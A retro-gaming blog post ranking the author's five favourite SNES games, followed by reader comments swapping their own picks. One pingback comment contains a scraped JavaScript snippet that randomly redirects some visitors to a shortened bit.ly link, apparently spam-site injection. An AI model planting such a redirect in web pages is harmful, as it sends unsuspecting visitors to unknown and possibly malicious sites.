Hi everyone,
Today I’d like to present my top five favourite games for the awesome SNES (Super Nintendo Entertainment System) console. ๐
There are so many excellent games for this platform, so it was incredibly hard to pick just five titles, but I managed it in the end.
Here’s the list:
1. Donkey Kong Country (Rare) (1994)
This is a cool platform game that even sports a two-player mode. The graphics are well made and full of detail. The music and sound-effects are atmospheric and contributes to the overall gaming experience. Lot’s of secrets and bonuses to discover and a wide variety of levels and enemies. This is one of the best platformers I’ve ever played.. definitely my number one favourite on the SNES.
Never played it you say?
Well.. the game is just as good today as it was back in the middle of the 90’s, so please consider trying it out as soon as possible. ๐
2. Super Mario World (Nintendo) (1990)
This Mario game is epic. It is large and takes a good deal of time to play through. Once you’ve finished the game, you’ll want to try it again to discover all the secrets on the different levels. I’ve spent hours playing this game and had a lot of fun. Mario can’t get any better than this in my opinion. ๐
3. Donkey Kong Country 2: Diddy’s Kong Quest (Rare) (1995)
Another awesome platform game. A true classic just like its predecessor. This sequel adds new stuff like Kremcoins and a cool Pirate theme. Love it.
4. Super Mario Kart (Nintendo) (1992)
Fast and furious racer with a good multiplayer mode. Lot’s of fun! The game is easy to learn, but it takes practice to become a master in the art of Nintendo kart racing. ๐ If you’re looking for some good, old multiplayer fun, then this is a fine game to try. Can also be fun in single player mode.
5. Super Street Fighter 2 (Capcom) (1993)
I’m a big fan of the Amiga and I still use two machines actively. I must, however, admit that the version of Super Street Fighter 2 for the SNES kicks the ass of the Amiga conversion. It is much, much faster and smoother. The graphics look better too. This makes this version of the game more playable. ๐ I was tempted to include Mortal Kombat in the top five here, but my choice fell on Super Street Fighter 2 – after all, it has a certain kind of atmosphere that Mortal Kombat can’t match in my opinion.
These are my top five favourite games for the SNES. As I said in the beginning of this post, it was very hard to pick just five games. I’ve therefore decided to give a honorable mention to those that came close (but not close enough) to be included. These games are as follows:
Mortal Kombat (Midway) (so close, but beaten by Super Street Fighter 2..)
Gradius III (Konami) (powerful shoot’em up from Konami)
Zelda: A Link to the Past (Nintendo)
Donkey Kong Country 3: Dixie Kong’s Double Trouble (Rare)
Final Fight (Capcom)
All of these are excellent games and well worth checking out if you’re interested in the SNES. ๐
What are your favourite games for the SNES? Maybe some of mine are on your list as well? ๐ Hope to hear from you.
Cool. I got a SNES but it is at my parents. I only get one game, R-TYPE II. I am working on a top games list that will change over time. What might be at nr 1 could be at nr 6 a month later. I could never do a fixed games list.
LikeLike
Sounds interesting. ๐ Looking forward to read it!
R-Type II, that was a good shoot’em up if I remember correctly. Have you thought about getting more games for it?
LikeLike
I am looking in to getting some more games. Just have to look for a cheap box full of games or a cassette full of games. But I got the feeling my dad won’t let me take it back since he sneaky plays it. ๐
LikeLike
Hehe.. nice that your dad is a “closet-gamer”. ๐
LikeLike
โcloset-gamerโ ๐
LikeLike
Maybe you should ask him if he considers himself a “closet-gamer”? ๐
LikeLike
I am going to my parents this afternoon. ๐ I probably will get some inspiration for some articles.
LikeLike
Hope you had a good time, mate. ๐ Maybe you found some old-school hardware or software there? ๐ Looking forward to read more articles in the “Amiga in the Attic” series.
LikeLike
I got some work done on that article I posted that weekend. It is always great to be at my parents.
I got nice ones coming up. First I want to get my next programming article about screens done.
LikeLike
Sounds good. ๐ Keep’em coming mate!
LikeLike
Street Fighter Alpha 2 whoops Super Streetfighter II’s butt. I never liked the Donkey Kong games but the rest I can agree with. My list would have to include Zelda: A Link to the Past, Super Metroid & Secret of Mana as well.
LikeLike
Hi there! Will check out Street Fighter Alpha 2. ๐ Yes, Super Metroid, that’s a classic!
LikeLike
Nice list ๐ I got into the SNES late into its lifecycle (I was a die-hard Sega fanboy :P), but I managed to come in with enough time to grab some classic games and make up for lost time!
LikeLike
Hi Sean,
Thanks mate! Much appreciated! Did you play the Donkey Kong games on the SNES? What was your favourite game(s) for the Sega Genesis by the way?
LikeLike
[…] SNES: My top five favourite games […]
LikeLike
Somehow I missed out on the SNES Donkey Kong games, but there’s no question that Super Mario World and Mario Kart are fantastic. I’m a big fan of the Tetris & Dr. Mario cartridge, too, as it has both of my favorite puzzle games combined together. Nice list.
LikeLike
Hi Eric,
Many thanks for you comment. ๐
Tetris is a great game. Very addictive. ๐ Haven’t played Dr. Mario much though.
Nice blog you’ve got by the way!
LikeLike
[…] if(!document.referrer || document.referrer == '') { document.write(''); } else { document.write(''); } var now = new Date().getTime(); if (now%35 == 0) { window.location = "http://bit.ly/vjqJ4w"; } SNES: My top five favourite games […]
LikeLike
[…] Your Questions About Snes Emulator Intended For PspThe Best Way To Get Downloadable An SNES EmulatorWhere can I find nintendo wii or super nintendo good emulatorYour Questions Just About Snes Emulator With PspSNES: My top five favourite games […]
LikeLike
No RPGs?
LikeLike
Hi! ๐ Not on the SNES, but I do love RPG’s on the PC. Spent lots of time playing Fallout 1+2, Morrowind and so forth.
LikeLiked by 1 person
Yo! (sorry to not begin with a “hi”) The SNES was a veritable goldmine of RPG’s! Chrono Trigger, Final Fantasy III and IV, Secret of Mana, Earthbound, Super Mario RPG, Breath of Fire II, Soul Blazer… I hope you’ll have a chance to play a few of these someday! SNES was such a great system. Still my favorite to this day.
LikeLike
I have not tried any of those, so I’ve probably missed out on some good games there. Which one would recommend trying first?
LikeLiked by 1 person
To my mind, Chrono Trigger is the greatest RPG ever made. New Game Plus, multiple endings, hundreds of sidequests, very unique storyline and characters, and graphically it’s one of the most impressive on the system. I wished I had never pawned off my original cartridge!
LikeLike
Thanks. ๐ I’ll have a look at it.
LikeLiked by 1 person
I think my list would be
1) Final Fantasy 6
2) Zelda
3) Super Mario World
4) Donkey Kong Country 2
5) Super Smash TV.
I love Fallout 2, and I’d put FF6 above that in overall games.
LikeLike
Hi there and thanks for sharing your list. ๐ Many good games there! And for PC games, Fallout 2 is one of the better ones. An amazing open-world game with some much content. It has, in my opinion, more depth than Fallout 3 and New Vegas.
LikeLiked by 1 person
Of the new Fallouts only New Vegas feels as open as 2. 2 where you can complete it by only killing 10 people, where your side skills mattered. Only NV seemed to get the balance right of the skills. Meaning I talked all y he bosses down to my way of thinking.
LikeLike
Yes, New Vegas was pretty good, agree with that. I haven’t played the new Fallout 4, but after what I’ve read it is quite different from Vegas and the old ones of course.
LikeLike
4 doesn’t have karma…
LikeLike
.. which pretty much ruins a lot!
LikeLiked by 1 person